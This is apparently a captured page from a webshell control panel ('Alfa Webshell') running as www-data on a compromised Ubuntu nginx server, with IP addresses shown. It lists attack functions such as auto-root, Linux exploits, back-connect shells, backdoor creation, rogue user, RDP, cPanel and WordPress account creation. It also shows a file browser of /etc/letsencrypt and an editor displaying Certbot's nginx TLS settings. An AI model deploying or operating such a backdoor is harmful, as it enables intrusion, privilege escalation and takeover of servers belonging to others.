Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
letsencrypt /
[ HOME SHELL ]
Name
Size
Permission
Action
accounts
[ DIR ]
drwx------
archive
[ DIR ]
drwx------
live
[ DIR ]
drwx------
renewal
[ DIR ]
drwxr-xr-x
renewal-hooks
[ DIR ]
drwxr-xr-x
.updated-options-ssl-apache-co...
64
B
-rw-r--r--
.updated-options-ssl-nginx-con...
64
B
-rw-r--r--
.updated-ssl-dhparams-pem-dige...
64
B
-rw-r--r--
cli.ini
207
B
-rw-r--r--
options-ssl-apache.conf
1005
B
-rw-r--r--
options-ssl-nginx.conf
774
B
-rw-r--r--
ssl-dhparams.pem
424
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : options-ssl-nginx.conf
# This file contains important security parameters. If you modify this file # manually, Certbot will be unable to automatically provide future security # updates. Instead, Certbot will print and log an error message with a path to # the up-to-date file that you will need to refer to when manually updating # this file. Contents are based on https://ssl-config.mozilla.org ssl_session_cache shared:le_nginx_SSL:10m; ssl_session_timeout 1440m; ssl_session_tickets off; ssl_protocols TLSv1.2 TLSv1.3; ssl_prefer_server_ciphers off; ssl_ciphers "ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384";
Close